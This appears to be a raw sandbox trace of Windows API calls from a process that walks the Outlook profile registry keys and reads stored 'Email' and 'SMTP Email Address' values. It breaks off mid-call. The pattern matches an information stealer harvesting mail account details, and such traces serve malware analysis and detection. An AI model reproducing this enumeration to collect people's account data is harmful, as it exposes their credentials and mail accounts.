0x75bec8 [0252.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.703] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0252.704] GetProcessHeap () returned 0x740000 [0252.704] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.705] RegCloseKey (hKey=0x204) returned 0x0 [0252.705] GetProcessHeap () returned 0x740000 [0252.705] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0252.706] GetProcessHeap () returned 0x740000 [0252.706] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0252.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.707] RegCloseKey (hKey=0x210) returned 0x0 [0252.707] GetProcessHeap () returned 0x740000 [0252.707] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b560 | out: hHeap=0x740000) returned 1 [0252.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.709] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x4, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="6c29d51f56390b45a924b3b787013a66", pcchName=0x19fb7c) returned 0x0 [0252.709] GetProcessHeap () returned 0x740000 [0252.709] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0252.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.711] RegOpenKeyW (in: hKey=0x218, lpSubKey="6c29d51f56390b45a924b3b787013a66", phkResult=0x75b640 | out: phkResult=0x75b640*=0x210) returned 0x0 [0252.711] GetProcessHeap () returned 0x740000 [0252.711] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0252.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.712] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0252.713] GetProcessHeap () returned 0x740000 [0252.713] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.755] GetProcessHeap () returned 0x740000 [0252.755] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0252.756] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0252.757] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66") returned 88 [0252.757] GetProcessHeap () returned 0x740000 [0252.757] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0252.757] GetProcessHeap () returned 0x740000 [0252.758] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.759] GetProcessHeap () returned 0x740000 [0252.759] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b650 [0252.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.760] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\6c29d51f56390b45a924b3b787013a66", phkResult=0x75b650 | out: phkResult=0x75b650*=0x204) returned 0x0 [0252.761] GetProcessHeap () returned 0x740000 [0252.761] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0252.761] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.762] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0252.762] GetProcessHeap () returned 0x740000 [0252.762] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.764] RegCloseKey (hKey=0x204) returned 0x0 [0252.764] GetProcessHeap () returned 0x740000 [0252.764] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b650 | out: hHeap=0x740000) returned 1 [0252.764] GetProcessHeap () returned 0x740000 [0252.765] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0252.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.766] RegCloseKey (hKey=0x210) returned 0x0 [0252.767] GetProcessHeap () returned 0x740000 [0252.767] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0252.767] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.768] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x5, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="8503020000000000c000000000000046", pcchName=0x19fb7c) returned 0x0 [0252.768] GetProcessHeap () returned 0x740000 [0252.768] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5f0 [0252.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.770] RegOpenKeyW (in: hKey=0x218, lpSubKey="8503020000000000c000000000000046", phkResult=0x75b5f0 | out: phkResult=0x75b5f0*=0x210) returned 0x0 [0252.770] GetProcessHeap () returned 0x740000 [0252.770] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0252.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.771] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0252.771] GetProcessHeap () returned 0x740000 [0252.772] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.772] GetProcessHeap () returned 0x740000 [0252.772] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0252.772] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0252.773] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0252.774] GetProcessHeap () returned 0x740000 [0252.774] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0252.774] GetProcessHeap () returned 0x740000 [0252.774] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.774] GetProcessHeap () returned 0x740000 [0252.774] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b540 [0252.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.776] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x75b540 | out: phkResult=0x75b540*=0x204) returned 0x0 [0252.777] GetProcessHeap () returned 0x740000 [0252.777] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0252.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.778] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0252.778] GetProcessHeap () returned 0x740000 [0252.778] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0252.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.780] RegCloseKey (hKey=0x204) returned 0x0 [0252.780] GetProcessHeap () returned 0x740000 [0252.780] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b540 | out: hHeap=0x740000) returned 1 [0252.780] GetProcessHeap () returned 0x740000 [0252.780] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0252.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.782] RegCloseKey (hKey=0x210) returned 0x0 [0252.782] GetProcessHeap () returned 0x740000 [0252.782] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5f0 | out: hHeap=0x740000) returned 1 [0252.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0252.783] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x6, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="8763203907727d498bce4b981b157d7b", pcchName=0x19fb7c) returned 0x0 [0252.783] GetProcessHeap () returned 0x740000 [0252.783] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b590 [0252.784] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0252.785] RegOpenKeyW (in: hKey=0x218, lpSubKey="8763203907727d498bce4b981b157d7b", phkResult=0x75b590 | out: phkResult=0x75b590*=0x210) returned 0x0 [0252.785] GetProcessHeap () returned 0x740000 [0252.785] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0253.036] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.037] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0253.037] GetProcessHeap () returned 0x740000 [0253.037] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.038] GetProcessHeap () returned 0x740000 [0253.038] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0253.038] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0253.039] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b") returned 88 [0253.039] GetProcessHeap () returned 0x740000 [0253.040] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0253.040] GetProcessHeap () returned 0x740000 [0253.040] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.040] GetProcessHeap () returned 0x740000 [0253.040] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b620 [0253.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.042] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", phkResult=0x75b620 | out: phkResult=0x75b620*=0x204) returned 0x0 [0253.042] GetProcessHeap () returned 0x740000 [0253.042] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0253.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.263] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0253.263] GetProcessHeap () returned 0x740000 [0253.264] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.265] RegCloseKey (hKey=0x204) returned 0x0 [0253.265] GetProcessHeap () returned 0x740000 [0253.265] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b620 | out: hHeap=0x740000) returned 1 [0253.265] GetProcessHeap () returned 0x740000 [0253.266] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0253.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.267] RegCloseKey (hKey=0x210) returned 0x0 [0253.268] GetProcessHeap () returned 0x740000 [0253.268] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b590 | out: hHeap=0x740000) returned 1 [0253.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.268] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x7, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="893893ade607c44aa338ac7df5d6cb42", pcchName=0x19fb7c) returned 0x0 [0253.269] GetProcessHeap () returned 0x740000 [0253.269] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5f0 [0253.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.270] RegOpenKeyW (in: hKey=0x218, lpSubKey="893893ade607c44aa338ac7df5d6cb42", phkResult=0x75b5f0 | out: phkResult=0x75b5f0*=0x210) returned 0x0 [0253.270] GetProcessHeap () returned 0x740000 [0253.270] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0253.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.271] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0253.271] GetProcessHeap () returned 0x740000 [0253.271] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.272] GetProcessHeap () returned 0x740000 [0253.272] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0253.272] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0253.273] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42") returned 88 [0253.273] GetProcessHeap () returned 0x740000 [0253.273] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0253.273] GetProcessHeap () returned 0x740000 [0253.274] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.274] GetProcessHeap () returned 0x740000 [0253.274] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0253.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.275] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", phkResult=0x75b6a0 | out: phkResult=0x75b6a0*=0x204) returned 0x0 [0253.278] GetProcessHeap () returned 0x740000 [0253.278] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0253.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.279] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0253.279] GetProcessHeap () returned 0x740000 [0253.279] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.281] RegCloseKey (hKey=0x204) returned 0x0 [0253.281] GetProcessHeap () returned 0x740000 [0253.281] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0253.281] GetProcessHeap () returned 0x740000 [0253.281] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0253.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.282] RegCloseKey (hKey=0x210) returned 0x0 [0253.282] GetProcessHeap () returned 0x740000 [0253.282] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5f0 | out: hHeap=0x740000) returned 1 [0253.283] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.283] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x8, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="9207f3e0a3b11019908b08002b2a56c2", pcchName=0x19fb7c) returned 0x0 [0253.283] GetProcessHeap () returned 0x740000 [0253.283] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0253.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.432] RegOpenKeyW (in: hKey=0x218, lpSubKey="9207f3e0a3b11019908b08002b2a56c2", phkResult=0x75b640 | out: phkResult=0x75b640*=0x210) returned 0x0 [0253.432] GetProcessHeap () returned 0x740000 [0253.432] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0253.433] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.433] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0253.433] GetProcessHeap () returned 0x740000 [0253.434] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.434] GetProcessHeap () returned 0x740000 [0253.434] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0253.435] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0253.436] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0253.436] GetProcessHeap () returned 0x740000 [0253.436] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0253.436] GetProcessHeap () returned 0x740000 [0253.437] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.437] GetProcessHeap () returned 0x740000 [0253.437] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b6a0 [0253.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.438] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x75b6a0 | out: phkResult=0x75b6a0*=0x204) returned 0x0 [0253.439] GetProcessHeap () returned 0x740000 [0253.439] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0253.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.440] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="", pcchName=0x19fb4c) returned 0x103 [0253.440] GetProcessHeap () returned 0x740000 [0253.440] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.442] RegCloseKey (hKey=0x204) returned 0x0 [0253.442] GetProcessHeap () returned 0x740000 [0253.442] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b6a0 | out: hHeap=0x740000) returned 1 [0253.442] GetProcessHeap () returned 0x740000 [0253.443] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fe20 | out: hHeap=0x740000) returned 1 [0253.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.444] RegCloseKey (hKey=0x210) returned 0x0 [0253.444] GetProcessHeap () returned 0x740000 [0253.444] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0253.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.445] SHEnumKeyExW (in: hkey=0x218, dwIndex=0x9, pszName=0x75bab0, pcchName=0x19fb7c | out: pszName="9375CFF0413111d3B88A00104B2A6676", pcchName=0x19fb7c) returned 0x0 [0253.445] GetProcessHeap () returned 0x740000 [0253.445] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b610 [0253.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.447] RegOpenKeyW (in: hKey=0x218, lpSubKey="9375CFF0413111d3B88A00104B2A6676", phkResult=0x75b610 | out: phkResult=0x75b610*=0x210) returned 0x0 [0253.447] GetProcessHeap () returned 0x740000 [0253.447] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0253.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.573] SHQueryValueExW (in: hkey=0x210, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208 | out: pdwType=0x0, pvData=0x75bec8, pcbData=0x19f6f0*=0x208) returned 0x2 [0253.573] GetProcessHeap () returned 0x740000 [0253.574] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.574] GetProcessHeap () returned 0x740000 [0253.574] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75bec8 [0253.575] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0253.575] wvsprintfW (in: param_1=0x75bec8, param_2="%s\\%s", arglist=0x19fb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0253.575] GetProcessHeap () returned 0x740000 [0253.575] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x75fe20 [0253.576] GetProcessHeap () returned 0x740000 [0253.576] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bec8 | out: hHeap=0x740000) returned 1 [0253.577] GetProcessHeap () returned 0x740000 [0253.577] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5e0 [0253.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.580] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x75b5e0 | out: phkResult=0x75b5e0*=0x204) returned 0x0 [0253.580] GetProcessHeap () returned 0x740000 [0253.581] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75bec8 [0253.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.582] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x0, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="00000001", pcchName=0x19fb4c) returned 0x0 [0253.582] GetProcessHeap () returned 0x740000 [0253.582] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0253.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.585] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000001", phkResult=0x75b640 | out: phkResult=0x75b640*=0x21c) returned 0x0 [0253.585] GetProcessHeap () returned 0x740000 [0253.585] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c2e0 [0253.586] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.586] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75c2e0, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x75c2e0, pcbData=0x19f6c0*=0x208) returned 0x2 [0253.586] GetProcessHeap () returned 0x740000 [0253.586] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c2e0 | out: hHeap=0x740000) returned 1 [0253.587] GetProcessHeap () returned 0x740000 [0253.587] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f4a) returned 0x75fee0 [0253.590] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0253.594] wvsprintfW (in: param_1=0x75fee0, param_2="%s\\%s", arglist=0x19fb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned 97 [0253.594] GetProcessHeap () returned 0x740000 [0253.594] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xc6) returned 0x74de78 [0253.594] GetProcessHeap () returned 0x740000 [0253.594] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75fee0 | out: hHeap=0x740000) returned 1 [0253.595] GetProcessHeap () returned 0x740000 [0253.595] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5f0 [0253.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.596] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x75b5f0 | out: phkResult=0x75b5f0*=0x220) returned 0x0 [0253.596] GetProcessHeap () returned 0x740000 [0253.596] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c2e0 [0253.597] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.598] SHEnumKeyExW (in: hkey=0x220, dwIndex=0x0, pszName=0x75c2e0, pcchName=0x19fb1c | out: pszName="", pcchName=0x19fb1c) returned 0x103 [0253.598] GetProcessHeap () returned 0x740000 [0253.598] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c2e0 | out: hHeap=0x740000) returned 1 [0253.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.600] RegCloseKey (hKey=0x220) returned 0x0 [0253.600] GetProcessHeap () returned 0x740000 [0253.600] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b5f0 | out: hHeap=0x740000) returned 1 [0253.600] GetProcessHeap () returned 0x740000 [0253.600] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74de78 | out: hHeap=0x740000) returned 1 [0253.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.705] RegCloseKey (hKey=0x21c) returned 0x0 [0253.705] GetProcessHeap () returned 0x740000 [0253.706] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b640 | out: hHeap=0x740000) returned 1 [0253.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.707] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x1, pszName=0x75bec8, pcchName=0x19fb4c | out: pszName="00000002", pcchName=0x19fb4c) returned 0x0 [0253.707] GetProcessHeap () returned 0x740000 [0253.707] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b5c0 [0253.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0253.708] RegOpenKeyW (in: hKey=0x204, lpSubKey="00000002", phkResult=0x75b5c0 | out: phkResult=0x75b5c0*=0x21c) returned 0x0 [0253.708] GetProcessHeap () returned 0x740000 [0253.709] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c2e0 [0253.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.710] SHQueryValueExW (in: hkey=0x21c, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x75c2e0, pcbData=0x19f6c0*=0x208 | out: pdwType=0x0, pvData=0x75c2e0, pcbData=0x19f6c0*=0x1e) returned 0x0 [0253.710] GetProcessHeap () returned 0x740000 [0253.710] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x410) returned 0x75c6f8 [0253.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0253.711] SHQueryValueExW (in: hkey=0x21c, pszValue="SMTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208 | out: pdwType=0x0, pvData=0x75c6f8, pcbData=0x19f6b8*=0x208) returned 